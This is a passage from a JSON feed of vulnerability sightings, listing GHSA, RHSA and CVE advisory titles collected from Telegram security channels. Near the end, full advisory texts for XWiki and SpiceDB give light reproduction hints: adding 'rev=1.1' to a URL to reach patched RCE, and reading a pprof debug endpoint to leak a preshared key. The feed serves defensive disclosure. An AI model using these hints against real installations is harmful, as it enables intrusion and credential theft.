"https://ift.tt/zKv8uOx\n[GHSA-frxm-v7q3-v2wv] Insertion of Sensitive Information into Log File in OWASP DependencyCheck", "creation_timestamp": "2024-01-23T15:47:09.000000Z"}, {"uuid": "15193950-d8be-480c-88bc-f77bb2020ab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV5G-Q4H3-64Q4", "type": "seen", "source": "https://t.me/ctinow/172067", "content": "https://ift.tt/AZGD15U\n[GHSA-hv5g-q4h3-64q4] Hard-coded credentials in org.folio:mod-remote-storage", "creation_timestamp": "2024-01-23T15:47:08.000000Z"}, {"uuid": "fb587978-c220-40f3-bbcd-36ba4ea6f646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-85RF-XH54-WHP3", "type": "seen", "source": "https://t.me/ctinow/172604", "content": "https://ift.tt/D8N0OIy\nCVE-2024-22050 | iodine up to 0.7.33 Static File Service path traversal (GHSA-85rf-xh54-whp3)", "creation_timestamp": "2024-01-24T09:41:23.000000Z"}, {"uuid": "b03e287b-c65b-4ca2-a0d3-4db083bc6287", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2XW-HW8G-6773", "type": "seen", "source": "https://t.me/ctinow/172603", "content": "https://ift.tt/HkKX6wV\nCVE-2024-22048 | govuk_tech_docs up to 3.3.0 Search Result cross site scripting (GHSA-x2xw-hw8g-6773)", "creation_timestamp": "2024-01-24T09:41:22.000000Z"}, {"uuid": "92e914d0-215c-4f05-9d53-077910ec867f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV9J-C866-GP5H", "type": "seen", "source": "https://t.me/ctinow/165275", "content": "https://ift.tt/ypcTVrf\n[GHSA-rv9j-c866-gp5h] Microsoft.IdentityModel.Protocols.SignedHttpRequest remote code execution vulnerability", "creation_timestamp": "2024-01-09T19:31:59.000000Z"}, {"uuid": "eb6050c8-7db7-421d-90b7-1c601520a4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0094", "type": "seen", "source": "https://t.me/ctinow/165141", "content": "https://ift.tt/reT24fO\nRHSA-2024:0094: Moderate: Red Hat Single Sign-On 7.6.6 security update on RHEL 7", "creation_timestamp": "2024-01-09T17:17:27.000000Z"}, {"uuid": "d496e9bd-66ff-42c5-b520-304e8c6b7762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0095", "type": "seen", "source": "https://t.me/ctinow/165140", "content": "https://ift.tt/Nqa7Yvb\nRHSA-2024:0095: Moderate: Red Hat Single Sign-On 7.6.6 security update on RHEL 8", "creation_timestamp": "2024-01-09T17:17:26.000000Z"}, {"uuid": "83ba2e78-44cb-430f-90e8-4b2650ca0f42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0096", "type": "seen", "source": "https://t.me/ctinow/165139", "content": "https://ift.tt/OBCoFe8\nRHSA-2024:0096: Moderate: Red Hat Single Sign-On 7.6.6 security update on RHEL 9", "creation_timestamp": "2024-01-09T17:17:25.000000Z"}, {"uuid": "1f494a3b-cfeb-40f4-b65f-1d62ba561a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0195", "type": "seen", "source": "https://t.me/ctinow/164856", "content": "https://ift.tt/UAuaMyz\nCVE-2019-17626 | ReportLab up to 3.5.26 colors.py toColor XML Document xml injection (RHSA-2020:0195)", "creation_timestamp": "2024-01-09T08:36:19.000000Z"}, {"uuid": "ec320f67-7a3b-48de-a6bb-62d2d5d0c56e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0006", "type": "seen", "source": "https://t.me/ctinow/161601", "content": "https://ift.tt/gIpjLkX\nRHSA-2024:0006: Important: tigervnc security update", "creation_timestamp": "2024-01-02T09:16:48.000000Z"}, {"uuid": "5eb824b7-27a6-4090-b181-6d5342694370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0011", "type": "seen", "source": "https://t.me/ctinow/161600", "content": "https://ift.tt/m7nha9p\nRHSA-2024:0011: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:47.000000Z"}, {"uuid": "be3e990c-eaf5-48d5-871e-177507834add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0012", "type": "seen", "source": "https://t.me/ctinow/161599", "content": "https://ift.tt/XWh7PRv\nRHSA-2024:0012: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:45.000000Z"}, {"uuid": "f13161ce-0d57-4175-ae36-d510036f72f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0017", "type": "seen", "source": "https://t.me/ctinow/161598", "content": "https://ift.tt/8tU6VQi\nRHSA-2024:0017: Important: tigervnc security update", "creation_timestamp": "2024-01-02T09:16:44.000000Z"}, {"uuid": "c28329e4-6917-4353-8353-16bf47eadaae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0020", "type": "seen", "source": "https://t.me/ctinow/161596", "content": "https://ift.tt/9uZTcqx\nRHSA-2024:0020: Important: tigervnc security update", "creation_timestamp": "2024-01-02T09:16:39.000000Z"}, {"uuid": "375254c4-d254-48a2-8ecd-d8133742d779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93P6-9CXV-5RPQ", "type": "seen", "source": "https://t.me/ctinow/165202", "content": "https://ift.tt/LmoSUXx\n[GHSA-93p6-9cxv-5rpq] juzawebCMS Incorrect Access Control vulnerability", "creation_timestamp": "2024-01-09T18:31:16.000000Z"}, {"uuid": "c1d51671-9f81-44b6-a2b6-2081129f11af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0050", "type": "seen", "source": "https://t.me/ctinow/165188", "content": "https://ift.tt/2SAdDsz\nRHSA-2024:0050: Important: OpenShift Container Platform 4.14.8 bug fix and security update", "creation_timestamp": "2024-01-09T18:16:51.000000Z"}, {"uuid": "df2a38ba-99e8-4833-91bc-6ba3d205b19a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0100", "type": "seen", "source": "https://t.me/ctinow/165187", "content": "https://ift.tt/YdmD9Ca\nRHSA-2024:0100: Moderate: Red Hat build of Keycloak 22.0.8 images enhancement and security update", "creation_timestamp": "2024-01-09T18:16:50.000000Z"}, {"uuid": "0deabbcd-59e6-4af7-a4d3-30b5b314e0f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0101", "type": "seen", "source": "https://t.me/ctinow/165186", "content": "https://ift.tt/34D7yjN\nRHSA-2024:0101: Moderate: Red Hat build of Keycloak 22.0.8 enhancement and security update", "creation_timestamp": "2024-01-09T18:16:48.000000Z"}, {"uuid": "2c186e4b-3f26-42f2-897e-36210cb63a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G955-RWXX-JVF6", "type": "seen", "source": "https://t.me/ctinow/159040", "content": "https://ift.tt/Y5iEwy3\nCVE-2023-46736 | EspoCRM up to 8.0.4 Upload Image From URL API /Attachment/fromImageUrl server-side request forgery (GHSA-g955-rwxx-jvf6)", "creation_timestamp": "2023-12-24T15:26:22.000000Z"}, {"uuid": "2af818e7-366a-4b27-83ae-c0f5ad47049a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V5F6-HJMF-9MC5", "type": "seen", "source": "https://t.me/ctinow/159037", "content": "https://ift.tt/WTjIk14\nCVE-2023-49297 | iterative PyDrive2 1.17.0 YAML deserialization (GHSA-v5f6-hjmf-9mc5)", "creation_timestamp": "2023-12-24T15:26:19.000000Z"}, {"uuid": "e26ef7c6-5ef5-4fdc-9310-7a85d96141e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6M9R-7WRX-XMR6", "type": "seen", "source": "https://t.me/ctinow/157905", "content": "https://ift.tt/WZwVNMQ\n[GHSA-6m9r-7wrx-xmr6] Apache Airflow Cross-Site Request Forgery vulnerability", "creation_timestamp": "2023-12-21T19:26:37.000000Z"}, {"uuid": "2d1a6cfe-4ebf-4879-9fb7-cf23f300c71d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJ93-39PF-7MCF", "type": "seen", "source": "https://t.me/ctinow/157904", "content": "https://ift.tt/z4qy7xT\n[GHSA-jj93-39pf-7mcf] bsock uses weak hashing algorithms", "creation_timestamp": "2023-12-21T19:26:35.000000Z"}, {"uuid": "44e44ed7-4687-49fe-8a4f-0cea58b78817", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8F57-WCMG-4JMH", "type": "seen", "source": "https://t.me/ctinow/157903", "content": "https://ift.tt/4yS8ZGA\n[GHSA-8f57-wcmg-4jmh] Apache Airflow vulnerable to Exposure of Resource to Wrong Sphere", "creation_timestamp": "2023-12-21T19:26:34.000000Z"}, {"uuid": "a1bcd6d0-0d03-4169-a4f8-2c859f161ed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXCH-WR7M-RWXJ", "type": "seen", "source": "https://t.me/ctinow/157902", "content": "https://ift.tt/chedqC9\n[GHSA-pxch-wr7m-rwxj] Apache Airflow has a stored cross-site scripting vulnerability", "creation_timestamp": "2023-12-21T19:26:33.000000Z"}, {"uuid": "eef6c2ed-33b4-49c5-8a84-77983820c50d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0025", "type": "seen", "source": "https://t.me/ctinow/161594", "content": "https://ift.tt/Q123M0J\nRHSA-2024:0025: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:37.000000Z"}, {"uuid": "70879c2a-ee9a-4b05-9ab8-cd6ed679bd6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0026", "type": "seen", "source": "https://t.me/ctinow/161593", "content": "https://ift.tt/iYAx7Zv\nRHSA-2024:0026: Important: firefox security update", "creation_timestamp": "2024-01-02T09:16:36.000000Z"}, {"uuid": "a338fc63-0bb8-4240-929f-a5c41ecbe649", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7854", "type": "seen", "source": "https://t.me/ctinow/161687", "content": "https://ift.tt/FPxqjaN\nCVE-2023-6134 | JBoss KeyCloak Incomplete Fix CVE-2020-10748 redirect_uri cross site scripting (RHSA-2023:7854)", "creation_timestamp": "2024-01-02T11:31:29.000000Z"}, {"uuid": "05749a59-c5db-4c51-a98b-93316c233b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8V8W-V8XG-79RF", "type": "seen", "source": "https://t.me/ctinow/158804", "content": "https://ift.tt/rg9cPdK\nCVE-2023-49291 | tj-actions branch-names up to 7.0.6 input validation (GHSA-8v8w-v8xg-79rf)", "creation_timestamp": "2023-12-23T12:41:37.000000Z"}, {"uuid": "c516acdd-0334-4054-a7f0-326bc08f1fbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0001", "type": "seen", "source": "https://t.me/ctinow/161562", "content": "https://ift.tt/qYzutW5\nRHSA-2024:0001: Important: thunderbird security update", "creation_timestamp": "2024-01-02T08:16:44.000000Z"}, {"uuid": "a47b8e53-4c09-48cb-bdb8-797edd71d3e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0003", "type": "seen", "source": "https://t.me/ctinow/161561", "content": "https://ift.tt/FvXq1Ln\nRHSA-2024:0003: Important: thunderbird security update", "creation_timestamp": "2024-01-02T08:16:43.000000Z"}, {"uuid": "eeb88614-4b47-4fff-8e7d-c8ddd96a30b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0004", "type": "seen", "source": "https://t.me/ctinow/161560", "content": "https://ift.tt/vYielO6\nRHSA-2024:0004: Important: thunderbird security update", "creation_timestamp": "2024-01-02T08:16:42.000000Z"}, {"uuid": "e9cc10f3-e976-412d-9c4a-ff77ef60c17c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0005", "type": "seen", "source": "https://t.me/ctinow/161559", "content": "https://ift.tt/O1USCB0\nRHSA-2024:0005: Important: thunderbird security update", "creation_timestamp": "2024-01-02T08:16:40.000000Z"}, {"uuid": "a413cee6-6cdb-40a9-a212-80a01f19280d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88J4-PCX8-Q4Q3", "type": "seen", "source": "https://t.me/ctinow/161323", "content": "https://ift.tt/WH2tx9D\nCVE-2023-49804 | louislam uptime-kuma up to 1.23.8 Password Change session fixiation (GHSA-88j4-pcx8-q4q3)", "creation_timestamp": "2024-01-01T15:06:55.000000Z"}, {"uuid": "4882d2cf-1f1f-424c-a001-b5d67ce47cf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QP42-5PJ7-4CCM", "type": "seen", "source": "https://t.me/ctinow/159674", "content": "https://ift.tt/B0YswZ3\n[GHSA-qp42-5pj7-4ccm] Concrete CMS Cross Site Request Forgery (CSRF)", "creation_timestamp": "2023-12-27T16:17:11.000000Z"}, {"uuid": "c630c1f1-f905-4fa8-9d41-a6a8df15bd97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7676", "type": "seen", "source": "https://t.me/ctinow/159078", "content": "https://ift.tt/ZYha8Wt\nCVE-2023-5384 | Infinispan Configuration information disclosure (RHSA-2023:7676)", "creation_timestamp": "2023-12-24T18:22:00.000000Z"}, {"uuid": "f370a228-09fd-46bb-870d-97dd2806d5c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CGWQ-6PRQ-8H9Q", "type": "seen", "source": "https://t.me/ctinow/159045", "content": "https://ift.tt/kUamxYE\nCVE-2023-49282 | Microsoft Graph msgraph-sdk-php up to 1.109.0/2.0.0-RC4 GetPhpInfo.php phpInfo information disclosure (GHSA-cgwq-6prq-8h9q)", "creation_timestamp": "2023-12-24T15:26:28.000000Z"}, {"uuid": "40676972-6229-4ea9-b9b6-b55b08d717f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2FR7-CC7P-P45Q", "type": "seen", "source": "https://t.me/ctinow/158992", "content": "https://ift.tt/jyDgFQB\nCVE-2023-49280 | XWiki application-changerequest up to 1.9 XML File insufficiently protected credentials (GHSA-2fr7-cc7p-p45q)", "creation_timestamp": "2023-12-24T11:11:59.000000Z"}, {"uuid": "c00e35b0-4fa4-45c0-8cea-307ef9193c50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0071", "type": "seen", "source": "https://t.me/ctinow/164239", "content": "https://ift.tt/7bIyV6Z\nRHSA-2024:0071: Important: squid security update", "creation_timestamp": "2024-01-08T09:16:43.000000Z"}, {"uuid": "218f559f-c530-4f36-a564-6e62d743a005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6F4-JWV9-682W", "type": "seen", "source": "https://t.me/ctinow/163239", "content": "https://ift.tt/nw10CPq\n[GHSA-v6f4-jwv9-682w] class.upload.php allows cross-site scripting attacks via uploaded files", "creation_timestamp": "2024-01-04T21:31:41.000000Z"}, {"uuid": "7bdc9971-84e5-4dc3-b986-27b5c001e102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GRHP-F66Q-X857", "type": "seen", "source": "https://t.me/ctinow/158763", "content": "https://ift.tt/v7R0AxM\nCVE-2023-48698 | azure-rtos usbx up to 6.2.1 unusual condition (GHSA-grhp-f66q-x857)", "creation_timestamp": "2023-12-23T10:21:55.000000Z"}, {"uuid": "e4efe7c9-650c-4c56-9766-403b991ea81f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2P9-WP2Q-WJV4", "type": "seen", "source": "https://t.me/ctinow/158762", "content": "https://ift.tt/uamkB1r\nCVE-2023-48697 | azure-rtos usbx up to 6.2.1 null pointer dereference (GHSA-p2p9-wp2q-wjv4)", "creation_timestamp": "2023-12-23T10:21:54.000000Z"}, {"uuid": "c0de0ab4-fd79-4bf7-b401-17400d0df55a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H733-98HQ-F884", "type": "seen", "source": "https://t.me/ctinow/158761", "content": "https://ift.tt/4fFlbDz\nCVE-2023-48696 | azure-rtos usbx up to 6.2.1 unusual condition (GHSA-h733-98hq-f884)", "creation_timestamp": "2023-12-23T10:21:53.000000Z"}, {"uuid": "590481c8-863b-4320-9641-f1fabfa8481d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MWJ9-RPPH-V8WC", "type": "seen", "source": "https://t.me/ctinow/158760", "content": "https://ift.tt/tkDyUbJ\nCVE-2023-48695 | azure-rtos usbx up to 6.2.1 out-of-bounds write (GHSA-mwj9-rpph-v8wc)", "creation_timestamp": "2023-12-23T10:21:52.000000Z"}, {"uuid": "23fa43f3-751a-4721-b6c8-1b2f7bd57941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJW8-7W86-44QJ", "type": "seen", "source": "https://t.me/ctinow/158759", "content": "https://ift.tt/JIA5o06\nCVE-2023-48694 | azure-rtos usbx up to 6.2.1 type confusion (GHSA-qjw8-7w86-44qj)", "creation_timestamp": "2023-12-23T10:21:50.000000Z"}, {"uuid": "58b26f88-24a1-4cba-91c0-7dd3250d5022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7886", "type": "seen", "source": "https://t.me/ctinow/164051", "content": "https://ift.tt/ogRc9aL\nCVE-2023-6478 | X.org X11 Server prior 21.1.10 Request out-of-bounds (RHSA-2023:7886)", "creation_timestamp": "2024-01-07T03:36:28.000000Z"}, {"uuid": "03fddbb7-07b1-4075-a33b-dd7f0b51b8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7886", "type": "seen", "source": "https://t.me/ctinow/164046", "content": "https://ift.tt/HuVCftZ\nCVE-2023-6377 | X.org X11 Server prior 21.1.10 XKB Button Action out-of-bounds write (RHSA-2023:7886)", "creation_timestamp": "2024-01-07T03:06:24.000000Z"}, {"uuid": "a3c99c48-9ae8-4b3c-89ce-abc2280aec29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ7P-XJV7-7229", "type": "seen", "source": "https://t.me/ctinow/164520", "content": "https://ift.tt/Iktx8S7\n[GHSA-rj7p-xjv7-7229] XWiki Remote Code Execution Vulnerability via User Registration", "creation_timestamp": "2024-01-08T17:46:33.000000Z"}, {"uuid": "049c5719-f1b1-4bdd-bce5-84cf179b895d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH35-W7WG-95V3", "type": "seen", "source": "https://t.me/ctinow/164518", "content": "https://ift.tt/KaFUv89\n[GHSA-xh35-w7wg-95v3] XWiki has no right protection on rollback action", "creation_timestamp": "2024-01-08T17:36:51.000000Z"}, {"uuid": "e0354a87-ef79-4e04-ad4c-58fa88cb0365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2F4-CVQM-65W2", "type": "seen", "source": "https://t.me/ctinow/164496", "content": "https://ift.tt/VP5kFWd\n[GHSA-c2f4-cvqm-65w2] Puma HTTP Request/Response Smuggling vulnerability", "creation_timestamp": "2024-01-08T17:12:01.000000Z"}, {"uuid": "1beb9d97-9005-44e4-960a-51e7f27d4a02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HR2C-P8RH-238H", "type": "seen", "source": "https://t.me/ctinow/164493", "content": "https://ift.tt/N0k6XBP\n[GHSA-hr2c-p8rh-238h] Apache Axis Improper Input Validation vulnerability", "creation_timestamp": "2024-01-08T16:56:30.000000Z"}, {"uuid": "35c0d7f9-bd02-47ab-bb56-dd426e1f8e83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQPQ-2P68-46FV", "type": "seen", "source": "https://t.me/ctinow/164492", "content": "https://ift.tt/iKkeGOy\n[GHSA-mqpq-2p68-46fv] pyload Unauthenticated Flask Configuration Leakage vulnerability", "creation_timestamp": "2024-01-08T16:56:29.000000Z"}, {"uuid": "9b7a5b29-c7d0-439b-bb63-ee1c838b8ff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3067", "type": "seen", "source": "https://t.me/ctinow/164381", "content": "https://ift.tt/pq6Dcrn\nCVE-2019-14823 | JSS CryptoManager OCSP Policy certificate validation (RHSA-2019:3067)", "creation_timestamp": "2024-01-08T15:16:40.000000Z"}, {"uuid": "70944ff3-c0c7-4aec-8095-540f24b06baf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:1852", "type": "seen", "source": "https://t.me/cibsecurity/69052", "content": "\u203c CVE-2023-4042 \u203c\n\nA flaw was found in ghostscript. The fix for CVE-2020-16305 in ghostscript was not included in RHSA-2021:1852-06 advisory as it was claimed to be. This issue only affects the ghostscript package as shipped with Red Hat Enterprise Linux 8.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-08-23T16:13:48.000000Z"}, {"uuid": "5d973650-c00c-4148-966f-bd9790f07b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2G5C-228J-P52X", "type": "seen", "source": "https://t.me/cibsecurity/65768", "content": "\u203c CVE-2023-36468 \u203c\n\nXWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take CVE-2022-36100/GHSA-2g5c-228j-p52x as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history. This vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions. This vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros. As a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-06-30T00:14:48.000000Z"}, {"uuid": "678edfcf-c920-4162-94a8-bf52dad2353d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CJR9-MR35-7XH6", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/62198", "content": "\u203c CVE-2023-29193 \u203c\n\nSpiceDB is an open source, Google Zanzibar-inspired, database system for creating and managing security-critical application permissions. The `spicedb serve` command contains a flag named `--grpc-preshared-key` which is used to protect the gRPC API from being accessed by unauthorized requests. The values of this flag are to be considered sensitive, secret data. The `/debug/pprof/cmdline` endpoint served by the metrics service (defaulting running on port `9090`) reveals the command-line flags provided for debugging purposes. If a password is set via the `--grpc-preshared-key` then the key is revealed by this endpoint along with any other flags provided to the SpiceDB binary. This issue has been fixed in version 1.19.1. ### Impact All deployments abiding by the recommended best practices for production usage are **NOT affected**: - Authzed's SpiceDB Serverless - Authzed's SpiceDB Dedicated - SpiceDB Operator Users configuring SpiceDB via environment variables are **NOT affected**. Users **MAY be affected** if they expose their metrics port to an untrusted network and are configuring `--grpc-preshared-key` via command-line flag. ### Patches TODO ### Workarounds To workaround this issue you can do one of the following: - Configure the preshared key via an environment variable (e.g. `SPICEDB_GRPC_PRESHARED_KEY=yoursecret spicedb serve`) - Reconfigure the `--metrics-addr` flag to bind to a trusted network (e.g. `--metrics-addr=localhost:9090`) - Disable the metrics service via the flag (e.g. `--metrics-enabled=false`) - Adopt one of the recommended deployment models: [Authzed's managed services](https://authzed.com/pricing) or the [SpiceDB Operator](https://github.com/authzed/spicedb-operator) ### References - [GitHub Security Advisory issued for SpiceDB](https://github.com/authzed/spicedb/security/advisories/GHSA-cjr9-mr35-7xh6) - [Go issue #22085](https://github.com/golang/go/issues/22085) for documenting the risks of exposing pprof to the internet - [Go issue #42834](https://github.com/golang/go/issues/42834) discusses preventing pprof registration to the default serve mux - [semgrep rule go.lang.security.audit.net.pprof.pprof-debug-exposure](https://semgrep.dev/r?q=go.lang.security.audit.net.pprof) checks for a variation of this issue ### Credit We'd like to thank Amit Laish, a security researcher at GE Vernova for responsibly disclosing this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": 